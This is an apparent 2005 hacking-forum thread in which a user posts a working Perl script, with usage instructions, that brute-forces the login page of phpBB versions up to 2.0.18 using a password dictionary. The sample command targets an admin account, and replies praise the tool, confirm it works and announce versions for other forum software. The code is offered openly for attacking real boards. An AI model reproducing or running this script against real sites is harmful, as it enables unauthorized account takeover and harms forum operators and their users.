phpBB <=2.0.18 "Login Dictionnary Attack"

Discussion in 'Forum for discussion of ANTICHAT' started by néM3S!s, 21 Dec 2005.

  1. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    phpBB <=2.0.18 "Login Dictionnary Attack"
    --> Brute force login.php with dictionnary

    This exploit is Coded by my friend DarkFig.. enjOY antichat ;)

    Usage: brutephpbb.pl <host> <path> <port> <pass_file> <username> <logfile>

    C:\:brutephpbb.pl www.target.ru /phpBB2/ 80 dictionnary.txt admin result.txt


    Code:
    #!/usr/bin/perl 
    ############################################ 
    #--------------------------Hack Private Version property------------------------- 
    #Credits:                        Weakness and Xploit by DarkFig 
    #Affected products:     All PhpBB versions <= 2.0.18 
    #Type:                            Dictionnary attack 
    #Solutions:                    None official , but many solutions are possible ;) 
    #Note:                           Not yet revealed | If a line of the dictionnary file contain no data => "End of the password file" 
    #For:                             Hack Private Version       
    #------------------------------------------------------------------------------------------------ 
    ############################################ 
    use IO::Socket; 
    
    #--------------Utilisation--------------# 
    if(@ARGV != 6){ 
    print " 
    +---------------------------------------------------------------------------------+ 
    +--------------------PhpBB <= 2.0.18 Passwd Dictionnary Attack--------------------+ 
    +-----------------------By DarkFig for Hack Private Version-----------------------+ 
    +---------------------------------------------------------------------------------+ 
    + Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    + 
    +---------------------------------------------------------------------------------+ 
    + <host>        => The host where PhpBB is installed        |   [Ex: site.com]    + 
    + <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     + 
    + <port>        => PhpBB board port                         |   [Default is 80]   + 
    + <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    + 
    + <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] + 
    + <file_result> => File you want to log activity            |   [Ex: results.txt] + 
    +---------------------------------------------------------------------------------+ 
    ";exit();} 
    
    #--------------Data--------------# 
    $host       = $ARGV[0]; 
    $path       = $ARGV[1]; 
    $full       = "$host"."$path"; 
    $port       = $ARGV[2]; 
    $pass_file  = $ARGV[3]; 
    $username   = $ARGV[4]; 
    $fileresult = $ARGV[5]; 
    $OK         = 0; 
    $referer    = "http://"."$host"."$path"."login.php?redirect="; 
    $postit     = "$path"."login.php"; 
    
    #--------------Hello world-----------------# 
    print " 
    +---------------------------------------------------------+ 
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
    +---------------------------------------------------------+ 
           [+] Username             | $username 
           [+] Dictionnary file     | $pass_file 
           [+] Attack log           | $fileresult 
    +---------------------------------------------------------+"; 
    
    #--------------Password file--------------# 
    open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n"); 
    chomp(@passdico = <FILE>); 
    $nligne = "0"; 
    while ($OK ne 1) { 
    $passwordz  = "$passdico[$nligne]"; 
    $request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion"; 
    $length     = length $request; 
    if ($passwordz eq ""){print "\n[-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();} 
    
    #--------------Sending data--------------# 
    $send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed..."; 
    print $send "POST $postit HTTP/1.1\n"; 
    print $send "Host: $host\n"; 
    print $send "Content-Type: application/x-www-form-urlencoded\n"; 
    print $send "Content-Length: $length\n\n"; 
    print $send "$request\n"; 
    read $send, $answer, 15; 
    close($send); 
    
    #-------------Success--------------------------------------------# 
    if ($answer =~ /HTTP\/(.*?) 302/) { 
    $OK = 1; 
    print " 
           [-] Trying the password "."$passwordz 
           [+] User:     $username 
           [+] Password: $passwordz 
    +---------------------------------------------------------+\n"; 
    open results, ">$fileresult"; 
    print results " 
    +---------------------------------------------------------+ 
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
    +---------------------------------------------------------+ 
        [+] PhpBB board               | $full 
       [+] Board's port              | $port 
       [+] Username                  | $username 
       [+] Dictionnary file          | $pass_file 
        [+] Number of test            | $nligne 
        [+] Password found            | $passwordz 
    +---------------------------------------------------------+\n"; 
    close(FILE);close(results);exit();} 
    
    #-------------Failed--------------------------------------------# 
    if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nligne++;}}
    Made in France ! :D
     
    8 people like this.
  2. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
  3. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,548
    Likes Received:
    1,397
    Reputations:
    611
    big tnx
    nice ;)
     
  4. x-ultra-x

    x-ultra-x Elder - Старейшина

    Joined:
    5 Oct 2005
    Messages:
    45
    Likes Received:
    7
    Reputations:
    -2
    well done man, good job!
     
  5. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    good... ;) France is friend
     
  6. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    ipb, punbb versions coming soon ;)

    Powaaaaaaaa my friends !
     
  7. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    307
    Reputations:
    201
    The speed is not very high, but IT WORKS=) 10x
    +!
     
  8. roruda_semu

    roruda_semu New Member

    Joined:
    17 Dec 2005
    Messages:
    16
    Likes Received:
    4
    Reputations:
    -3
    Good job Nemesis , thanks
     
  9. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    271
    Likes Received:
    88
    Reputations:
    17
    Excuse me,where can I get a Dictionnary?
     
  10. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
Loading...
Similar Threads - phpBB Login Dictionnary
  1. canvasa
    Replies:
    5
    Views:
    4,320
  2. neM3Sis
    Replies:
    0
    Views:
    2,736
  3. neM3Sis
    Replies:
    2
    Views:
    3,431